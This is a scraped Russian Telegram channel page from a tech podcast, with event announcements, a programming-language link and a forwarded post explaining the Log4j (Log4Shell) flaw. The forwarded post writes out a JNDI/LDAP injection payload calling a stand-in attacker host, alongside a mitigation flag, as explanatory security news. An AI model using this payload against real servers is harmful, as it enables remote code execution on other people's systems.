Полезняшки от "Разбора Полетов"
1.44K subscribers
146 photos
15 videos
4 files
4.53K links
Полезные статьи и новости от авторов подкаста "Разбор Полетов". Единственный подкаст, где бывшие ведущие призывают к убийству бывших слушателей 🔥🔥

По всем вопросам @abashev
Download Telegram
Кстати про кнопочку Repair IDE
Встречаемся на ночном образовательном шоу IT Nights 3.0

10 декабря в прямом эфире @JBaruch обещает исповедоваться, а @asm0dey предстоит отстоять честь славного дома Котлин. Ещё будут спикеры из Facebook, Яндекса, VK, X5 Group с другими заданиями. Самое прекрасное, что зрители смогут влиять на происходящее в кадре!

Запоминай:
• 10 декабря в 19:00
• it-nights.ru
• промокод: razborpoletov

Чего бы ты ни ждал — будет иначе 👀
Ни дня без нового JVM языка! https://flix.dev/
Почти 10 минут
👍1
Встречаемся на ночном образовательном шоу IT Nights 3.0

10 декабря в прямом эфире @JBaruch обещает исповедоваться, а @asm0dey предстоит отстоять честь славного дома Котлин. Ещё будут спикеры из Facebook, Яндекса, VK, X5 Group с другими заданиями. Самое прекрасное, что зрители смогут влиять на происходящее в кадре!

Запоминай:
• 10 декабря в 19:00
• it-nights.ru
• промокод: razborpoletov

Чего бы ты ни ждал — будет иначе 👀
Forwarded from Кавычка (Bo0oM)
У половины интернета нашли выполнение произвольного кода через Log4j.

Выглядит это так:

1) Посылаем специально сформированный запрос вида ${jndi:ldap://attacker.host/blabla} в любое место, которое потенциально может залогироваться.
2) JNDI (Java Naming and Directory Interface) в свою очередь обрабатывает шаблон, запрашивает данные через LDAP у attacker.host
3) В ответе отдается JAVA класс, который и позволяет выполнить произвольный код.

Гроб. Гроб. Кладбище.
Временный фикс: JAVA_OPTS="-Dlog4j.formatMsgNoLookups=true”

Вот примеры того, что уязвимо (От Cloudflare и Apple до серверов майнкрафта).